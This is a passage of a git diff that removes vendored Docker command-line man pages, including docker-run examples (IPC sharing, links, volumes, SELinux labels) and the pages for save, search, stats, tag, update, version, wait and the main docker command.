-m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status - 0x01128e25 0 root 600 1000 7 -``` - -Now run a regular container, and it correctly does NOT see the shared memory segment from the host: - -``` - $ docker run -it shm ipcs -m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status -``` - -Run a container with the new `--ipc=host` option, and it now sees the shared memory segment from the host httpd: - - ``` - $ docker run -it --ipc=host shm ipcs -m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status - 0x01128e25 0 root 600 1000 7 -``` -Testing `--ipc=container:CONTAINERID` mode: - -Start a container with a program to create a shared memory segment: -``` - $ docker run -it shm bash - $ sudo shm/shm_server & - $ sudo ipcs -m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status - 0x0000162e 0 root 666 27 1 -``` -Create a 2nd container correctly shows no shared memory segment from 1st container: -``` - $ docker run shm ipcs -m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status -``` - -Create a 3rd container using the new --ipc=container:CONTAINERID option, now it shows the shared memory segment from the first: - -``` - $ docker run -it --ipc=container:ed735b2264ac shm ipcs -m - $ sudo ipcs -m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status - 0x0000162e 0 root 666 27 1 -``` - -## Linking Containers - -> **Note**: This section describes linking between containers on the -> default (bridge) network, also known as "legacy links". Using `--link` -> on user-defined networks uses the DNS-based discovery, which does not add -> entries to `/etc/hosts`, and does not set environment variables for -> discovery. - -The link feature allows multiple containers to communicate with each other. For -example, a container whose Dockerfile has exposed port 80 can be run and named -as follows: - - # docker run --name=link-test -d -i -t fedora/httpd - -A second container, in this case called linker, can communicate with the httpd -container, named link-test, by running with the **--link=:** - - # docker run -t -i --link=link-test:lt --name=linker fedora /bin/bash - -Now the container linker is linked to container link-test with the alias lt. -Running the **env** command in the linker container shows environment variables - with the LT (alias) context (**LT_**) - - # env - HOSTNAME=668231cb0978 - TERM=xterm - LT_PORT_80_TCP=tcp://172.17.0.3:80 - LT_PORT_80_TCP_PORT=80 - LT_PORT_80_TCP_PROTO=tcp - LT_PORT=tcp://172.17.0.3:80 - PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin - PWD=/ - LT_NAME=/linker/lt - SHLVL=1 - HOME=/ - LT_PORT_80_TCP_ADDR=172.17.0.3 - _=/usr/bin/env - -When linking two containers Docker will use the exposed ports of the container -to create a secure tunnel for the parent to access. - -If a container is connected to the default bridge network and `linked` -with other containers, then the container's `/etc/hosts` file is updated -with the linked container's name. - -> **Note** Since Docker may live update the container's `/etc/hosts` file, there -may be situations when processes inside the container can end up reading an -empty or incomplete `/etc/hosts` file. In most cases, retrying the read again -should fix the problem. - - -## Mapping Ports for External Usage - -The exposed port of an application can be mapped to a host port using the **-p** -flag. For example, an httpd port 80 can be mapped to the host port 8080 using the -following: - - # docker run -p 8080:80 -d -i -t fedora/httpd - -## Creating and Mounting a Data Volume Container - -Many applications require the sharing of persistent data across several -containers. Docker allows you to create a Data Volume Container that other -containers can mount from. For example, create a named container that contains -directories /var/volume1 and /tmp/volume2. The image will need to contain these -directories so a couple of RUN mkdir instructions might be required for you -fedora-data image: - - # docker run --name=data -v /var/volume1 -v /tmp/volume2 -i -t fedora-data true - # docker run --volumes-from=data --name=fedora-container1 -i -t fedora bash - -Multiple --volumes-from parameters will bring together multiple data volumes from -multiple containers. And it's possible to mount the volumes that came from the -DATA container in yet another container via the fedora-container1 intermediary -container, allowing to abstract the actual data source from users of that data: - - # docker run --volumes-from=fedora-container1 --name=fedora-container2 -i -t fedora bash - -## Mounting External Volumes - -To mount a host directory as a container volume, specify the absolute path to -the directory and the absolute path for the container directory separated by a -colon: - - # docker run -v /var/db:/data1 -i -t fedora bash - -When using SELinux, be aware that the host has no knowledge of container SELinux -policy. Therefore, in the above example, if SELinux policy is enforced, the -`/var/db` directory is not writable to the container. A "Permission Denied" -message will occur and an avc: message in the host's syslog. - - -To work around this, at time of writing this man page, the following command -needs to be run in order for the proper SELinux policy type label to be attached -to the host directory: - - # chcon -Rt svirt_sandbox_file_t /var/db - - -Now, writing to the /data1 volume in the container will be allowed and the -changes will also be reflected on the host in /var/db. - -## Using alternative security labeling - -You can override the default labeling scheme for each container by specifying -the `--security-opt` flag. For example, you can specify the MCS/MLS level, a -requirement for MLS systems. Specifying the level in the following command -allows you to share the same content between containers. - - # docker run --security-opt label=level:s0:c100,c200 -i -t fedora bash - -An MLS example might be: - - # docker run --security-opt label=level:TopSecret -i -t rhel7 bash - -To disable the security labeling for this container versus running with the -`--permissive` flag, use the following command: - - # docker run --security-opt label=disable -i -t fedora bash - -If you want a tighter security policy on the processes within a container, -you can specify an alternate type for the container. You could run a container -that is only allowed to listen on Apache ports by executing the following -command: - - # docker run --security-opt label=type:svirt_apache_t -i -t centos bash - -Note: - -You would have to write policy defining a `svirt_apache_t` type. - -## Setting device weight - -If you want to set `/dev/sda` device weight to `200`, you can specify the device -weight by `--blkio-weight-device` flag. Use the following command: - - # docker run -it --blkio-weight-device "/dev/sda:200" ubuntu - -## Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Microsoft Windows. The `--isolation ` option sets a container's isolation -technology. On Linux, the only supported is the `default` option which uses -Linux namespaces. These two commands are equivalent on Linux: - -``` -$ docker run -d busybox top -$ docker run -d --isolation default busybox top -``` - -On Microsoft Windows, can take any of these values: - -* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. -* `process`: Namespace isolation only. -* `hyperv`: Hyper-V hypervisor partition-based isolation. - -In practice, when running on Microsoft Windows without a `daemon` option set, these two commands are equivalent: - -``` -$ docker run -d --isolation default busybox top -$ docker run -d --isolation process busybox top -``` - -If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`, any of these commands also result in `hyperv` isolation: - -``` -$ docker run -d --isolation default busybox top -$ docker run -d --isolation hyperv busybox top -``` - -## Setting Namespaced Kernel Parameters (Sysctls) - -The `--sysctl` sets namespaced kernel parameters (sysctls) in the -container. For example, to turn on IP forwarding in the containers -network namespace, run this command: - - $ docker run --sysctl net.ipv4.ip_forward=1 someimage - -Note: - -Not all sysctls are namespaced. Docker does not support changing sysctls -inside of a container that also modify the host system. As the kernel -evolves we expect to see more sysctls become namespaced. - -See the definition of the `--sysctl` option above for the current list of -supported sysctls. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -July 2014, updated by Sven Dowideit -November 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-save.1.md b/vendor/github.com/docker/docker/man/docker-save.1.md deleted file mode 100644 index 1d1de8a1df..0000000000 --- a/vendor/github.com/docker/docker/man/docker-save.1.md +++ /dev/null @@ -1,45 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-save - Save one or more images to a tar archive (streamed to STDOUT by default) - -# SYNOPSIS -**docker save** -[**--help**] -[**-o**|**--output**[=*OUTPUT*]] -IMAGE [IMAGE...] - -# DESCRIPTION -Produces a tarred repository to the standard output stream. Contains all -parent layers, and all tags + versions, or specified repo:tag. - -Stream to a file instead of STDOUT by using **-o**. - -# OPTIONS -**--help** - Print usage statement - -**-o**, **--output**="" - Write to a file, instead of STDOUT - -# EXAMPLES - -Save all fedora repository images to a fedora-all.tar and save the latest -fedora image to a fedora-latest.tar: - - $ docker save fedora > fedora-all.tar - $ docker save --output=fedora-latest.tar fedora:latest - $ ls -sh fedora-all.tar - 721M fedora-all.tar - $ ls -sh fedora-latest.tar - 367M fedora-latest.tar - -# See also -**docker-load(1)** to load an image from a tar archive on STDIN. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-search.1.md b/vendor/github.com/docker/docker/man/docker-search.1.md deleted file mode 100644 index ad8bbc78b2..0000000000 --- a/vendor/github.com/docker/docker/man/docker-search.1.md +++ /dev/null @@ -1,70 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-search - Search the Docker Hub for images - -# SYNOPSIS -**docker search** -[**-f**|**--filter**[=*[]*]] -[**--help**] -[**--limit**[=*LIMIT*]] -[**--no-trunc**] -TERM - -# DESCRIPTION - -Search Docker Hub for images that match the specified `TERM`. The table -of images returned displays the name, description (truncated by default), number -of stars awarded, whether the image is official, and whether it is automated. - -*Note* - Search queries will only return up to 25 results - -# OPTIONS - -**-f**, **--filter**=[] - Filter output based on these conditions: - - stars= - - is-automated=(true|false) - - is-official=(true|false) - -**--help** - Print usage statement - -**--limit**=*LIMIT* - Maximum returned search results. The default is 25. - -**--no-trunc**=*true*|*false* - Don't truncate output. The default is *false*. - -# EXAMPLES - -## Search Docker Hub for ranked images - -Search a registry for the term 'fedora' and only display those images -ranked 3 or higher: - - $ docker search --filter=stars=3 fedora - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - mattdm/fedora A basic Fedora image corresponding roughly... 50 - fedora (Semi) Official Fedora base image. 38 - mattdm/fedora-small A small Fedora image on which to build. Co... 8 - goldmann/wildfly A WildFly application server running on a ... 3 [OK] - -## Search Docker Hub for automated images - -Search Docker Hub for the term 'fedora' and only display automated images -ranked 1 or higher: - - $ docker search --filter=is-automated=true --filter=stars=1 fedora - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - goldmann/wildfly A WildFly application server running on a ... 3 [OK] - tutum/fedora-20 Fedora 20 image with SSH access. For the r... 1 [OK] - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 -April 2016, updated by Vincent Demeester - diff --git a/vendor/github.com/docker/docker/man/docker-start.1.md b/vendor/github.com/docker/docker/man/docker-start.1.md deleted file mode 100644 index c00b0a1668..0000000000 --- a/vendor/github.com/docker/docker/man/docker-start.1.md +++ /dev/null @@ -1,39 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-start - Start one or more containers - -# SYNOPSIS -**docker start** -[**-a**|**--attach**] -[**--detach-keys**[=*[]*]] -[**--help**] -[**-i**|**--interactive**] -CONTAINER [CONTAINER...] - -# DESCRIPTION - -Start one or more containers. - -# OPTIONS -**-a**, **--attach**=*true*|*false* - Attach container's STDOUT and STDERR and forward all signals to the - process. The default is *false*. - -**--detach-keys**="" - Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. - -**--help** - Print usage statement - -**-i**, **--interactive**=*true*|*false* - Attach container's STDIN. The default is *false*. - -# See also -**docker-stop(1)** to stop a container. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-stats.1.md b/vendor/github.com/docker/docker/man/docker-stats.1.md deleted file mode 100644 index 0f022cd412..0000000000 --- a/vendor/github.com/docker/docker/man/docker-stats.1.md +++ /dev/null @@ -1,57 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-stats - Display a live stream of one or more containers' resource usage statistics - -# SYNOPSIS -**docker stats** -[**-a**|**--all**] -[**--help**] -[**--no-stream**] -[**--format[="*TEMPLATE*"]**] -[CONTAINER...] - -# DESCRIPTION - -Display a live stream of one or more containers' resource usage statistics - -# OPTIONS -**-a**, **--all**=*true*|*false* - Show all containers. Only running containers are shown by default. The default is *false*. - -**--help** - Print usage statement - -**--no-stream**=*true*|*false* - Disable streaming stats and only pull the first result, default setting is false. - -**--format**="*TEMPLATE*" - Pretty-print containers statistics using a Go template. - Valid placeholders: - .Container - Container name or ID. - .Name - Container name. - .ID - Container ID. - .CPUPerc - CPU percentage. - .MemUsage - Memory usage. - .NetIO - Network IO. - .BlockIO - Block IO. - .MemPerc - Memory percentage (Not available on Windows). - .PIDs - Number of PIDs (Not available on Windows). - -# EXAMPLES - -Running `docker stats` on all running containers - - $ docker stats - CONTAINER CPU % MEM USAGE / LIMIT MEM % NET I/O BLOCK I/O - 1285939c1fd3 0.07% 796 KiB / 64 MiB 1.21% 788 B / 648 B 3.568 MB / 512 KB - 9c76f7834ae2 0.07% 2.746 MiB / 64 MiB 4.29% 1.266 KB / 648 B 12.4 MB / 0 B - d1ea048f04e4 0.03% 4.583 MiB / 64 MiB 6.30% 2.854 KB / 648 B 27.7 MB / 0 B - -Running `docker stats` on multiple containers by name and id. - - $ docker stats fervent_panini 5acfcb1b4fd1 - CONTAINER CPU % MEM USAGE/LIMIT MEM % NET I/O - 5acfcb1b4fd1 0.00% 115.2 MiB/1.045 GiB 11.03% 1.422 kB/648 B - fervent_panini 0.02% 11.08 MiB/1.045 GiB 1.06% 648 B/648 B diff --git a/vendor/github.com/docker/docker/man/docker-stop.1.md b/vendor/github.com/docker/docker/man/docker-stop.1.md deleted file mode 100644 index fa377c92c4..0000000000 --- a/vendor/github.com/docker/docker/man/docker-stop.1.md +++ /dev/null @@ -1,30 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-stop - Stop a container by sending SIGTERM and then SIGKILL after a grace period - -# SYNOPSIS -**docker stop** -[**--help**] -[**-t**|**--time**[=*10*]] -CONTAINER [CONTAINER...] - -# DESCRIPTION -Stop a container (Send SIGTERM, and then SIGKILL after - grace period) - -# OPTIONS -**--help** - Print usage statement - -**-t**, **--time**=*10* - Number of seconds to wait for the container to stop before killing it. Default is 10 seconds. - -#See also -**docker-start(1)** to restart a stopped container. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-tag.1.md b/vendor/github.com/docker/docker/man/docker-tag.1.md deleted file mode 100644 index 7f27e1b0e1..0000000000 --- a/vendor/github.com/docker/docker/man/docker-tag.1.md +++ /dev/null @@ -1,76 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-tag - Create a tag `TARGET_IMAGE` that refers to `SOURCE_IMAGE` - -# SYNOPSIS -**docker tag** -[**--help**] -SOURCE_NAME[:TAG] TARGET_NAME[:TAG] - -# DESCRIPTION -Assigns a new alias to an image in a registry. An alias refers to the -entire image name including the optional `TAG` after the ':'. - -# "OPTIONS" -**--help** - Print usage statement. - -**NAME** - The image name which is made up of slash-separated name components, - optionally prefixed by a registry hostname. The hostname must comply with - standard DNS rules, but may not contain underscores. If a hostname is - present, it may optionally be followed by a port number in the format - `:8080`. If not present, the command uses Docker's public registry located at - `registry-1.docker.io` by default. Name components may contain lowercase - characters, digits and separators. A separator is defined as a period, one or - two underscores, or one or more dashes. A name component may not start or end - with a separator. - -**TAG** - The tag assigned to the image to version and distinguish images with the same - name. The tag name may contain lowercase and uppercase characters, digits, - underscores, periods and dashes. A tag name may not start with a period or a - dash and may contain a maximum of 128 characters. - -# EXAMPLES - -## Tagging an image referenced by ID - -To tag a local image with ID "0e5574283393" into the "fedora" repository with -"version1.0": - - docker tag 0e5574283393 fedora/httpd:version1.0 - -## Tagging an image referenced by Name - -To tag a local image with name "httpd" into the "fedora" repository with -"version1.0": - - docker tag httpd fedora/httpd:version1.0 - -Note that since the tag name is not specified, the alias is created for an -existing local version `httpd:latest`. - -## Tagging an image referenced by Name and Tag - -To tag a local image with name "httpd" and tag "test" into the "fedora" -repository with "version1.0.test": - - docker tag httpd:test fedora/httpd:version1.0.test - -## Tagging an image for a private repository - -To push an image to a private registry and not the central Docker -registry you must tag it with the registry hostname and port (if needed). - - docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0 - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -July 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 -June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-top.1.md b/vendor/github.com/docker/docker/man/docker-top.1.md deleted file mode 100644 index a666f7cd37..0000000000 --- a/vendor/github.com/docker/docker/man/docker-top.1.md +++ /dev/null @@ -1,36 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-top - Display the running processes of a container - -# SYNOPSIS -**docker top** -[**--help**] -CONTAINER [ps OPTIONS] - -# DESCRIPTION - -Display the running process of the container. ps-OPTION can be any of the options you would pass to a Linux ps command. - -All displayed information is from host's point of view. - -# OPTIONS -**--help** - Print usage statement - -# EXAMPLES - -Run **docker top** with the ps option of -x: - - $ docker top 8601afda2b -x - PID TTY STAT TIME COMMAND - 16623 ? Ss 0:00 sleep 99999 - - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -June 2015, updated by Ma Shimiao -December 2015, updated by Pavel Pospisil diff --git a/vendor/github.com/docker/docker/man/docker-unpause.1.md b/vendor/github.com/docker/docker/man/docker-unpause.1.md deleted file mode 100644 index e6fd3c4e01..0000000000 --- a/vendor/github.com/docker/docker/man/docker-unpause.1.md +++ /dev/null @@ -1,28 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-unpause - Unpause all processes within one or more containers - -# SYNOPSIS -**docker unpause** -CONTAINER [CONTAINER...] - -# DESCRIPTION - -The `docker unpause` command un-suspends all processes in the specified containers. -On Linux, it does this using the cgroups freezer. - -See the [cgroups freezer documentation] -(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for -further details. - -# OPTIONS -**--help** - Print usage statement - -# See also -**docker-pause(1)** to pause all processes within one or more containers. - -# HISTORY -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-update.1.md b/vendor/github.com/docker/docker/man/docker-update.1.md deleted file mode 100644 index 85f3dd07c1..0000000000 --- a/vendor/github.com/docker/docker/man/docker-update.1.md +++ /dev/null @@ -1,171 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-update - Update configuration of one or more containers - -# SYNOPSIS -**docker update** -[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] -[**--cpu-shares**[=*0*]] -[**--cpu-period**[=*0*]] -[**--cpu-quota**[=*0*]] -[**--cpu-rt-period**[=*0*]] -[**--cpu-rt-runtime**[=*0*]] -[**--cpuset-cpus**[=*CPUSET-CPUS*]] -[**--cpuset-mems**[=*CPUSET-MEMS*]] -[**--help**] -[**--kernel-memory**[=*KERNEL-MEMORY*]] -[**-m**|**--memory**[=*MEMORY*]] -[**--memory-reservation**[=*MEMORY-RESERVATION*]] -[**--memory-swap**[=*MEMORY-SWAP*]] -[**--restart**[=*""*]] -CONTAINER [CONTAINER...] - -# DESCRIPTION - -The **docker update** command dynamically updates container configuration. -You can use this command to prevent containers from consuming too many -resources from their Docker host. With a single command, you can place -limits on a single container or on many. To specify more than one container, -provide space-separated list of container names or IDs. - -With the exception of the **--kernel-memory** option, you can specify these -options on a running or a stopped container. On kernel version older than -4.6, You can only update **--kernel-memory** on a stopped container or on -a running container with kernel memory initialized. - -# OPTIONS - -**--blkio-weight**=0 - Block IO weight (relative weight) accepts a weight value between 10 and 1000. - -**--cpu-shares**=0 - CPU shares (relative weight) - -**--cpu-period**=0 - Limit the CPU CFS (Completely Fair Scheduler) period - - Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify. - -**--cpu-quota**=0 - Limit the CPU CFS (Completely Fair Scheduler) quota - -**--cpu-rt-period**=0 - Limit the CPU real-time period in microseconds - - Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify. - -**--cpu-rt-runtime**=0 - Limit the CPU real-time runtime in microseconds - - Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex: - Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks. - - The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup. - -**--cpuset-cpus**="" - CPUs in which to allow execution (0-3, 0,1) - -**--cpuset-mems**="" - Memory nodes(MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. - -**--help** - Print usage statement - -**--kernel-memory**="" - Kernel memory limit (format: `[]`, where unit = b, k, m or g) - - Note that on kernel version older than 4.6, you can not update kernel memory on - a running container if the container is started without kernel memory initialized, - in this case, it can only be updated after it's stopped. The new setting takes - effect when the container is started. - -**-m**, **--memory**="" - Memory limit (format: , where unit = b, k, m or g) - - Note that the memory should be smaller than the already set swap memory limit. - If you want update a memory limit bigger than the already set swap memory limit, - you should update swap memory limit at the same time. If you don't set swap memory - limit on docker create/run but only memory limit, the swap memory is double - the memory limit. - -**--memory-reservation**="" - Memory soft limit (format: [], where unit = b, k, m or g) - -**--memory-swap**="" - Total memory limit (memory + swap) - -**--restart**="" - Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped). - -# EXAMPLES - -The following sections illustrate ways to use this command. - -### Update a container's cpu-shares - -To limit a container's cpu-shares to 512, first identify the container -name or ID. You can use **docker ps** to find these values. You can also -use the ID returned from the **docker run** command. Then, do the following: - -```bash -$ docker update --cpu-shares 512 abebf7571666 -``` - -### Update a container with cpu-shares and memory - -To update multiple resource configurations for multiple containers: - -```bash -$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse -``` - -### Update a container's kernel memory constraints - -You can update a container's kernel memory limit using the **--kernel-memory** -option. On kernel version older than 4.6, this option can be updated on a -running container only if the container was started with **--kernel-memory**. -If the container was started *without* **--kernel-memory** you need to stop -the container before updating kernel memory. - -For example, if you started a container with this command: - -```bash -$ docker run -dit --name test --kernel-memory 50M ubuntu bash -``` - -You can update kernel memory while the container is running: - -```bash -$ docker update --kernel-memory 80M test -``` - -If you started a container *without* kernel memory initialized: - -```bash -$ docker run -dit --name test2 --memory 300M ubuntu bash -``` - -Update kernel memory of running container `test2` will fail. You need to stop -the container before updating the **--kernel-memory** setting. The next time you -start it, the container uses the new value. - -Kernel version newer than (include) 4.6 does not have this limitation, you -can use `--kernel-memory` the same way as other options. - -### Update a container's restart policy - -You can change a container's restart policy on a running container. The new -restart policy takes effect instantly after you run `docker update` on a -container. - -To update restart policy for one or more containers: - -```bash -$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse -``` - -Note that if the container is started with "--rm" flag, you cannot update the restart -policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the -container. diff --git a/vendor/github.com/docker/docker/man/docker-version.1.md b/vendor/github.com/docker/docker/man/docker-version.1.md deleted file mode 100644 index 1838f82052..0000000000 --- a/vendor/github.com/docker/docker/man/docker-version.1.md +++ /dev/null @@ -1,62 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2015 -# NAME -docker-version - Show the Docker version information. - -# SYNOPSIS -**docker version** -[**--help**] -[**-f**|**--format**[=*FORMAT*]] - -# DESCRIPTION -This command displays version information for both the Docker client and -daemon. - -# OPTIONS -**--help** - Print usage statement - -**-f**, **--format**="" - Format the output using the given Go template. - -# EXAMPLES - -## Display Docker version information - -The default output: - - $ docker version - Client: - Version: 1.8.0 - API version: 1.20 - Go version: go1.4.2 - Git commit: f5bae0a - Built: Tue Jun 23 17:56:00 UTC 2015 - OS/Arch: linux/amd64 - - Server: - Version: 1.8.0 - API version: 1.20 - Go version: go1.4.2 - Git commit: f5bae0a - Built: Tue Jun 23 17:56:00 UTC 2015 - OS/Arch: linux/amd64 - -Get server version: - - $ docker version --format '{{.Server.Version}}' - 1.8.0 - -Dump raw data: - -To view all available fields, you can use the format `{{json .}}`. - - $ docker version --format '{{json .}}' - {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}} - - -# HISTORY -June 2014, updated by Sven Dowideit -June 2015, updated by John Howard -June 2015, updated by Patrick Hemmer diff --git a/vendor/github.com/docker/docker/man/docker-wait.1.md b/vendor/github.com/docker/docker/man/docker-wait.1.md deleted file mode 100644 index 678800966b..0000000000 --- a/vendor/github.com/docker/docker/man/docker-wait.1.md +++ /dev/null @@ -1,30 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-wait - Block until one or more containers stop, then print their exit codes - -# SYNOPSIS -**docker wait** -[**--help**] -CONTAINER [CONTAINER...] - -# DESCRIPTION - -Block until one or more containers stop, then print their exit codes. - -# OPTIONS -**--help** - Print usage statement - -# EXAMPLES - - $ docker run -d fedora sleep 99 - 079b83f558a2bc52ecad6b2a5de13622d584e6bb1aea058c11b36511e85e7622 - $ docker wait 079b83f558a2bc - 0 - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker.1.md b/vendor/github.com/docker/docker/man/docker.1.md deleted file mode 100644 index 2a96184439..0000000000 --- a/vendor/github.com/docker/docker/man/docker.1.md +++ /dev/null @@ -1,237 +0,0 @@ -% DOCKER(1) Docker User Manuals -% William Henry -% APRIL 2014 -# NAME -docker \- Docker image and container command line interface - -# SYNOPSIS -**docker** [OPTIONS] COMMAND [ARG...] - -**docker** daemon [--help|...] - -**docker** [--help|-v|--version] - -# DESCRIPTION -is a client for interacting with the daemon (see **dockerd(8)**) through the CLI. - -The Docker CLI has over 30 commands. The commands are listed below and each has -its own man page which explain usage and arguments. - -To see the man page for a command run **man docker **. - -# OPTIONS -**--help** - Print usage statement - -**--config**="" - Specifies the location of the Docker client configuration files. The default is '~/.docker'. - -**-D**, **--debug**=*true*|*false* - Enable debug mode. Default is false. - -**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host]:[port][path] to bind or -unix://[/path/to/socket] to use. - The socket(s) to bind to in daemon mode specified using one or more - tcp://host:port/path, unix:///path/to/socket, fd://* or fd://socketfd. - If the tcp port is not specified, then it will default to either `2375` when - `--tls` is off, or `2376` when `--tls` is on, or `--tlsverify` is specified. - -**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*" - Set the logging level. Default is `info`. - -**--tls**=*true*|*false* - Use TLS; implied by --tlsverify. Default is false. - -**--tlscacert**=*~/.docker/ca.pem* - Trust certs signed only by this CA. - -**--tlscert**=*~/.docker/cert.pem* - Path to TLS certificate file. - -**--tlskey**=*~/.docker/key.pem* - Path to TLS key file. - -**--tlsverify**=*true*|*false* - Use TLS and verify the remote (daemon: verify client, client: verify daemon). - Default is false. - -**-v**, **--version**=*true*|*false* - Print version information and quit. Default is false. - -# COMMANDS -**attach** - Attach to a running container - See **docker-attach(1)** for full documentation on the **attach** command. - -**build** - Build an image from a Dockerfile - See **docker-build(1)** for full documentation on the **build** command. - -**commit** - Create a new image from a container's changes - See **docker-commit(1)** for full documentation on the **commit** command. - -**cp** - Copy files/folders between a container and the local filesystem - See **docker-cp(1)** for full documentation on the **cp** command. - -**create** - Create a new container - See **docker-create(1)** for full documentation on the **create** command. - -**diff** - Inspect changes on a container's filesystem - See **docker-diff(1)** for full documentation on the **diff** command. - -**events** - Get real time events from the server - See **docker-events(1)** for full documentation on the **events** command. - -**exec** - Run a command in a running container - See **docker-exec(1)** for full documentation on the **exec** command. - -**export** - Stream the contents of a container as a tar archive - See **docker-export(1)** for full documentation on the **export** command. - -**history** - Show the history of an image - See **docker-history(1)** for full documentation on the **history** command. - -**images** - List images - See **docker-images(1)** for full documentation on the **images** command. - -**import** - Create a new filesystem image from the contents of a tarball - See **docker-import(1)** for full documentation on the **import** command. - -**info** - Display system-wide information - See **docker-info(1)** for full documentation on the **info** command. - -**inspect** - Return low-level information on a container or image - See **docker-inspect(1)** for full documentation on the **inspect** command. - -**kill** - Kill a running container (which includes the wrapper process and everything -inside it) - See **docker-kill(1)** for full documentation on the **kill** command. - -**load** - Load an image from a tar archive - See **docker-load(1)** for full documentation on the **load** command. - -**login** - Log in to a Docker Registry - See **docker-login(1)** for full documentation on the **login** command. - -**logout** - Log the user out of a Docker Registry - See **docker-logout(1)** for full documentation on the **logout** command. - -**logs** - Fetch the logs of a container - See **docker-logs(1)** for full documentation on the **logs** command. - -**pause** - Pause all processes within a container - See **docker-pause(1)** for full documentation on the **pause** command. - -**port** - Lookup the public-facing port which is NAT-ed to PRIVATE_PORT - See **docker-port(1)** for full documentation on the **port** command. - -**ps** - List containers - See **docker-ps(1)** for full documentation on the **ps** command. - -**pull** - Pull an image or a repository from a Docker Registry - See **docker-pull(1)** for full documentation on the **pull** command. - -**push** - Push an image or a repository to a Docker Registry - See **docker-push(1)** for full documentation on the **push** command. - -**rename** - Rename a container. - See **docker-rename(1)** for full documentation on the **rename** command. - -**restart** - Restart one or more containers - See **docker-restart(1)** for full documentation on the **restart** command. - -**rm** - Remove one or more containers - See **docker-rm(1)** for full documentation on the **rm** command. - -**rmi** - Remove one or more images - See **docker-rmi(1)** for full documentation on the **rmi** command. - -**run** - Run a command in a new container - See **docker-run(1)** for full documentation on 